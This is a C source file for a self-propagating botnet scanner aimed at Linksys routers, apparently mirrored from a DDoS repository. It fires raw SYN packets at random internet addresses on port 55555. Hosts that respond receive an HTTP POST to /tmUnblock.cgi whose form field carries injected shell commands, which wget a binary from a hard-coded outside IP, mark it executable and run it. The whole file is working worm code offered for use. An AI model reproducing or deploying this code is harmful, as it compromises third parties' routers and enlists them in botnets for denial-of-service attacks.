Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Self Reps/LinkSys/linksys.c
5038 views
1
#ifdef SELFREP

2
#define _GNU_SOURCE

3


4
#ifdef DEBUG

5
    #include <stdio.h>

6
#endif

7
#include <unistd.h>

8
#include <stdlib.h>

9
#include <sys/socket.h>

10
#include <arpa/inet.h>

11
#include <sys/select.h>

12
#include <sys/types.h>

13
#include <time.h>

14
#include <fcntl.h>

15
#include <signal.h>

16
#include <errno.h>

17
#include <string.h>

18
#include <linux/ip.h>

19
#include <linux/tcp.h>

20


21
#include "includes.h"

22
#include "linksys.h"

23
#include "rand.h"

24
#include "util.h"

25
#include "checksum.h"

26
#include "table.h"

27


28
int linksys_scanner_pid = 0, linksys_rsck = 0, linksys_rsck_out = 0;

29
char linksys_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};

30
struct linksys_scanner_connection *conn_table;

31
uint32_t linksys_fake_time = 0;

32


33
int linksys_recv_strip_null(int sock, void *buf, int len, int flags)

34
{

35
    int ret = recv(sock, buf, len, flags);

36


37
    if(ret > 0)

38
    {

39
        int i = 0;

40


41
        for(i = 0; i < ret; i++)

42
        {

43
            if(((char *)buf)[i] == 0x00)

44
            {

45
                ((char *)buf)[i] = 'A';

46
            }

47
        }

48
    }

49


50
    return ret;

51
}

52


53
void linksys_scanner_init(void)

54
{

55
    int i = 0;

56
    uint16_t source_port;

57
    struct iphdr *iph;

58
    struct tcphdr *tcph;

59


60
    // Let parent continue on main thread

61
    linksys_scanner_pid = fork();

62
    if(linksys_scanner_pid > 0 || linksys_scanner_pid == -1)

63
        return;

64


65
    LOCAL_ADDR = util_local_addr();

66


67
    rand_init();

68
    linksys_fake_time = time(NULL);

69
    conn_table = calloc(linksys_SCANNER_MAX_CONNS, sizeof(struct linksys_scanner_connection));

70
    for(i = 0; i < linksys_SCANNER_MAX_CONNS; i++)

71
    {

72
        conn_table[i].state = linksys_SC_CLOSED;

73
        conn_table[i].fd = -1;

74
    }

75


76
    // Set up raw socket scanning and payload for ipfire/linksys variant

77
    if((linksys_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)

78
    {

79
        #ifdef DEBUG

80
            printf("[scanner] failed to initialize raw socket, cannot scan\n");

81
        #endif

82
        exit(0);

83
    }

84
    fcntl(linksys_rsck, F_SETFL, O_NONBLOCK | fcntl(linksys_rsck, F_GETFL, 0));

85
    i = 1;

86
    if(setsockopt(linksys_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)

87
    {

88
        #ifdef DEBUG

89
            printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");

90
        #endif

91
        close(linksys_rsck);

92
        exit(0);

93
    }

94


95
    do

96
    {

97
        source_port = rand_next() & 0xffff;

98
    }

99
    while(ntohs(source_port) < 1024);

100


101
    iph = (struct iphdr *)linksys_scanner_rawpkt;

102
    tcph = (struct tcphdr *)(iph + 1);

103


104
    // Set up IPv4 header

105
    iph->ihl = 5;

106
    iph->version = 4;

107
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));

108
    iph->id = rand_next();

109
    iph->ttl = 64;

110
    iph->protocol = IPPROTO_TCP;

111


112
    // Set up TCP header

113
    tcph->dest = htons(55555);

114
    tcph->source = source_port;

115
    tcph->doff = 5;

116
    tcph->window = rand_next() & 0xffff;

117
    tcph->syn = TRUE;

118


119
    #ifdef DEBUG

120
        printf("[scanner_huawei] scanner process initialized. scanning started.\n");

121
    #endif

122


123
    // Main logic loop

124
    while(TRUE)

125
    {

126
        fd_set fdset_rd, fdset_wr;

127
        struct linksys_scanner_connection *conn;

128
        struct timeval tim;

129
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

130


131
        // Spew out SYN to try and get a response

132
        if(linksys_fake_time != last_spew)

133
        {

134
            last_spew = linksys_fake_time;

135


136
            for(i = 0; i < linksys_SCANNER_RAW_PPS; i++)

137
            {

138
                struct sockaddr_in paddr = {0};

139
                struct iphdr *iph = (struct iphdr *)linksys_scanner_rawpkt;

140
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

141


142
                iph->id = rand_next();

143
                iph->saddr = LOCAL_ADDR;

144
                iph->daddr = linksys_get_random_ip();

145
                iph->check = 0;

146
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));

147


148
                tcph->dest = htons(55555);

149
                tcph->seq = iph->daddr;

150
                tcph->check = 0;

151
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));

152


153
                paddr.sin_family = AF_INET;

154
                paddr.sin_addr.s_addr = iph->daddr;

155
                paddr.sin_port = tcph->dest;

156


157
                sendto(linksys_rsck, linksys_scanner_rawpkt, sizeof(linksys_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));

158
            }

159
        }

160


161
        // Read packets from raw socket to get SYN+ACKs

162
        last_avail_conn = 0;

163
        while(TRUE)

164
        {

165
            int n = 0;

166
            char dgram[1514];

167
            struct iphdr *iph = (struct iphdr *)dgram;

168
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

169
            struct linksys_scanner_connection *conn;

170


171
            errno = 0;

172
            n = recvfrom(linksys_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);

173
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)

174
                break;

175


176
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))

177
                continue;

178
            if(iph->daddr != LOCAL_ADDR)

179
                continue;

180
            if(iph->protocol != IPPROTO_TCP)

181
                continue;

182
            if(tcph->source != htons(55555))

183
                continue;

184
            if(tcph->dest != source_port)

185
                continue;

186
            if(!tcph->syn)

187
                continue;

188
            if(!tcph->ack)

189
                continue;

190
            if(tcph->rst)

191
                continue;

192
            if(tcph->fin)

193
                continue;

194
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)

195
                continue;

196


197
            conn = NULL;

198
            for(n = last_avail_conn; n < linksys_SCANNER_MAX_CONNS; n++)

199
            {

200
                if(conn_table[n].state == linksys_SC_CLOSED)

201
                {

202
                    conn = &conn_table[n];

203
                    last_avail_conn = n;

204
                    break;

205
                }

206
            }

207


208
            // If there were no slots, then no point reading any more

209
            if(conn == NULL)

210
                break;

211


212
            conn->dst_addr = iph->saddr;

213
            conn->dst_port = tcph->source;

214
            linksys_setup_connection(conn);

215
        }

216


217
        FD_ZERO(&fdset_rd);

218
        FD_ZERO(&fdset_wr);

219


220
        for(i = 0; i < linksys_SCANNER_MAX_CONNS; i++)

221
        {

222
            int timeout = 5;

223


224
            conn = &conn_table[i];

225
            //timeout = (conn->state > linksys_SC_CONNECTING ? 30 : 5);

226


227
            if(conn->state != linksys_SC_CLOSED && (linksys_fake_time - conn->last_recv) > timeout)

228
            {

229
                close(conn->fd);

230
                conn->fd = -1;

231
                conn->state = linksys_SC_CLOSED;

232
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));

233


234
                continue;

235
            }

236


237
            if(conn->state == linksys_SC_CONNECTING || conn->state == linksys_SC_EXPLOIT_STAGE2 || conn->state == linksys_SC_EXPLOIT_STAGE3)

238
            {

239
                FD_SET(conn->fd, &fdset_wr);

240
                if(conn->fd > mfd_wr)

241
                    mfd_wr = conn->fd;

242
            }

243
            else if(conn->state != linksys_SC_CLOSED)

244
            {

245
                FD_SET(conn->fd, &fdset_rd);

246
                if(conn->fd > mfd_rd)

247
                    mfd_rd = conn->fd;

248
            }

249
        }

250


251
        tim.tv_usec = 0;

252
        tim.tv_sec = 1;

253
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);

254
        linksys_fake_time = time(NULL);

255


256
        for(i = 0; i < linksys_SCANNER_MAX_CONNS; i++)

257
        {

258
            conn = &conn_table[i];

259


260
            if(conn->fd == -1)

261
                continue;

262


263
            if(FD_ISSET(conn->fd, &fdset_wr))

264
            {

265
                int err = 0, ret = 0;

266
                socklen_t err_len = sizeof(err);

267


268
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);

269
                if(err == 0 && ret == 0)

270
                {

271
                    if(conn->state == linksys_SC_EXPLOIT_STAGE2)

272
                    {

273
                        #ifdef DEBUG

274
                            printf("[scanner] FD%d sending payload\n", conn->fd);

275
                        #endif

276
		

277
                        util_strcpy(conn->payload_buf, "POST /tmUnblock.cgi HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F188.166.2.226%2Fvb%2Fzen.mpsl%3B+chmod+777+zen.mpsl%3B+.%2FAres.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1");

278
						

279
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);

280
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));

281
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));

282


283
						

284
                        close(conn->fd);

285
                        linksys_setup_connection(conn);

286
                        conn->state = linksys_SC_EXPLOIT_STAGE3;

287


288
                        continue;

289
                    }

290
                    else if(conn->state == linksys_SC_EXPLOIT_STAGE3)

291
                    {

292
                        #ifdef DEBUG

293
                            printf("[scanner] FD%d finnished\n", conn->fd);

294
                        #endif

295


296
                        close(conn->fd);

297
                        conn->fd = -1;

298
                        conn->state = linksys_SC_CLOSED;

299


300
                        continue;

301
                    }

302
                    else

303
                    {

304
                        #ifdef DEBUG

305
                            printf("[scanner] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);

306
                        #endif

307


308
                        conn->state = linksys_SC_EXPLOIT_STAGE2;

309
                    }

310
                }

311
                else

312
                {

313
                    close(conn->fd);

314
                    conn->fd = -1;

315
                    conn->state = linksys_SC_CLOSED;

316


317
                    continue;

318
                }

319
            }

320


321
            if(FD_ISSET(conn->fd, &fdset_rd))

322
            {

323
                while(TRUE)

324
                {

325
                    int ret = 0;

326


327
                    if(conn->state == linksys_SC_CLOSED)

328
                        break;

329


330
                    if(conn->rdbuf_pos == linksys_SCANNER_RDBUF_SIZE)

331
                    {

332
                        memmove(conn->rdbuf, conn->rdbuf + linksys_SCANNER_HACK_DRAIN, linksys_SCANNER_RDBUF_SIZE - linksys_SCANNER_HACK_DRAIN);

333
                        conn->rdbuf_pos -= linksys_SCANNER_HACK_DRAIN;

334
                    }

335


336
                    errno = 0;

337
                    ret = linksys_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, linksys_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);

338
                    if(ret == 0)

339
                    {

340
                        errno = ECONNRESET;

341
                        ret = -1;

342
                    }

343
                    if(ret == -1)

344
                    {

345
                        if(errno != EAGAIN && errno != EWOULDBLOCK)

346
                        {

347
                            if(conn->state == linksys_SC_EXPLOIT_STAGE2)

348
                            {

349
                                close(conn->fd);

350
                                linksys_setup_connection(conn);

351
                                continue;

352
                            }

353


354
                            close(conn->fd);

355
                            conn->fd = -1;

356
                            conn->state = linksys_SC_CLOSED;

357
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));

358
                        }

359
                        break;

360
                    }

361


362
                    conn->rdbuf_pos += ret;

363
                    conn->last_recv = linksys_fake_time;

364


365
                    int len = util_strlen(conn->rdbuf);

366
                    conn->rdbuf[len] = 0;

367
                }

368
            }

369
        }

370
    }

371
}

372


373
void linksys_scanner_kill(void)

374
{

375
    kill(linksys_scanner_pid, 9);

376
}

377


378
static void linksys_setup_connection(struct linksys_scanner_connection *conn)

379
{

380
    struct sockaddr_in addr = {0};

381


382
    if(conn->fd != -1)

383
        close(conn->fd);

384


385
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

386
    {

387
        return;

388
    }

389


390
    conn->rdbuf_pos = 0;

391
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));

392


393
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));

394


395
    addr.sin_family = AF_INET;

396
    addr.sin_addr.s_addr = conn->dst_addr;

397
    addr.sin_port = conn->dst_port;

398


399
    conn->last_recv = linksys_fake_time;

400


401
    if(conn->state == linksys_SC_EXPLOIT_STAGE2 || conn->state == linksys_SC_EXPLOIT_STAGE3)

402
    {

403
    }

404
    else

405
    {

406
        conn->state = linksys_SC_CONNECTING;

407
    }

408


409
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));

410
}

411


412
static ipv4_t linksys_get_random_ip(void)

413
{

414
    uint32_t tmp;

415
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;

416


417
    do

418
    {

419
        tmp = rand_next();

420


421
        o1 = tmp & 0xff;

422
        o2 = (tmp >> 8) & 0xff;

423
        o3 = (tmp >> 16) & 0xff;

424
        o4 = (tmp >> 24) & 0xff;

425
    }

426
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback

427
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space

428
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company

429
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company

430
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service

431
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network

432
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network

433
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network

434
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved

435
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved

436
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use

437
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast

438
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense

439
    );

440
	

441
    int randnum = rand() % 3;

442
	if (randnum == 0)

443
	{

444
		return INET_ADDR(172,o2,o3,o4);

445
	}

446
	if (randnum == 1)

447
	{

448
		return INET_ADDR(98,o2,o3,o4);

449
	}

450
	if (randnum == 2)

451
	{

452
		return INET_ADDR(184,o2,o3,o4);

453
	}

454
	if (randnum == 3)

455
	{

456
		return INET_ADDR(70,o2,o3,o4);

457
	}

458
	if (randnum == 4)

459
	{

460
		return INET_ADDR(o1,o2,o3,o4);

461
	}

462
}

463


464
#endif

465


466